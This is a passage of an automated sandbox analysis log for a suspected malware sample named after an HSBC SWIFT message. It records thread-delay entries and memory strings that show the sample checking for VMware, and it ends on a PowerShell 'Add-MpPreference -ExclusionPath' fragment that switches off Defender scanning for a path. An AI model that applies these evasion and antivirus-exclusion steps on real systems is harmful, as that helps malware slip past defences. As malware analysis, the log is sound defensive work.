          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230064Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229906Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229250Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229140Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229030Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 228656Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 223547Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 223184Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 223075Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeWindow / User API: threadDelayed 4958Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeWindow / User API: threadDelayed 3383Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5331Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 570Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5369Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 697Jump to behavior
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239857Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239734Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 31504Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239624Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239515Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239404Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239295Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239187Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 239077Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238952Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238827Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238593Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238484Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238374Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238250Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238139Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 238031Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237921Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237811Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237593Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237484Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237374Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237265Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237156Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 237046Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236937Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236827Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236718Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236608Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236498Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236389Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236280Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236168Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 236062Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235952Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235843Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235734Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235624Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235515Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235405Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235296Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235124Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 235015Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234905Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234791Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234664Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234546Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234406Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234295Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 234156Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233977Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233856Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233702Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233590Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 233478Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 232547Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231469Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231347Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231203Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 231052Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230932Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230801Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230640Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230512Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230405Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230296Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230187Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 230064Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229906Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229703Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229250Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229140Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 229030Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 228656Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 223547Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 223184Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread delayed: delay time: 223075Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000001C.00000000.545118083.0000000005F99000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
          Source: explorer.exe, 0000000A.00000000.396953851.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000001C.00000000.608135815.0000000005670000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000001C.00000003.562119015.00000000058E8000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
          Source: explorer.exe, 0000001C.00000003.545714758.000000000602E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000A.00000000.433884115.0000000008551000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BI>
          Source: explorer.exe, 0000000A.00000000.408944868.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.599662864.0000000010573000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5C
          Source: explorer.exe, 0000001C.00000000.538460199.0000000000B3E000.00000004.00000020.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\8fb~+
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B%
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.383609954.00000000012BF000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000003.562119015.00000000058E8000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_
          Source: explorer.exe, 0000001C.00000000.607740622.0000000004C00000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000001C.00000003.561805870.000000000594D000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000001C.00000003.562379103.00000000059B3000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001C.00000000.607740622.0000000004C00000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000001C.00000003.593615957.0000000010433000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BF
          Source: explorer.exe, 0000001C.00000003.593615957.0000000010433000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z
          Source: explorer.exe, 0000001C.00000003.604332920.0000000010433000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001C.00000003.593615957.0000000010433000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000001C.00000003.591114501.0000000010556000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B>
          Source: explorer.exe, 0000001C.00000003.583702359.0000000010433000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 0000000A.00000000.455497902.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
